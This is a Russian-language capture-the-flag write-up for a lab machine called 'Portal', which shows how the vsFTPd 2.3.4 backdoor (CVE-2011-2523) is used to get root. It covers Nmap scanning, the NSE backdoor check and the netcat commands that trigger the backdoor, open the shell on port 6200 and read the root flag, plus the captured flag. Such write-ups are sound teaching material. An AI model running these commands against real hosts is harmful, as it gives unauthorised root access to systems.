
Подробное руководство по тестированию на проникновение и отчет об эксплуатации для машины 'Portal', с фокусом на CVE-2011-2523 (бэкдор vsFTPd 2.3.4) для получения root-доступа.
⚠️ Этот проект предназначен только для образовательных и авторизованных целей тестирования.
Несанкционированный доступ к системам строго запрещен.
SYAFIQ
Роль: Ведущий специалист по тестированию на проникновение
| Фаза | Инструмент | Описание |
|---|---|---|
| Обнаружение | Nmap | Сканирование сети на предмет активных узлов |
| Перебор | Nmap | Определение служб и их версий |
| Анализ | NSE Script | Обнаружение известной уязвимости |
| Эксплуатация | Netcat | Активация бэкдора |
| Пост-эксплуатация | Terminal | Получение root-доступа и извлечение флага |
Сканирование активных узлов в сети:
nmap -sn --unprivileged 10.150.150.10-30
✅ Результат:
Сканирование открытых портов и служб:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ Находки:
Проверка на наличие известной уязвимости бэкдора FTP:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 Результат:
Активация бэкдора с помощью вредоносного имени пользователя:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ Это открывает скрытую root-оболочку на порту 6200
Подключение к бэкдору и выполнение команд:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
🏁 Флаг захвачен:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
❌ Не используйте эти знания для незаконных действий.
«Безопасность — это не продукт, а процесс». — Всегда тестируйте, контролируйте и улучшайте.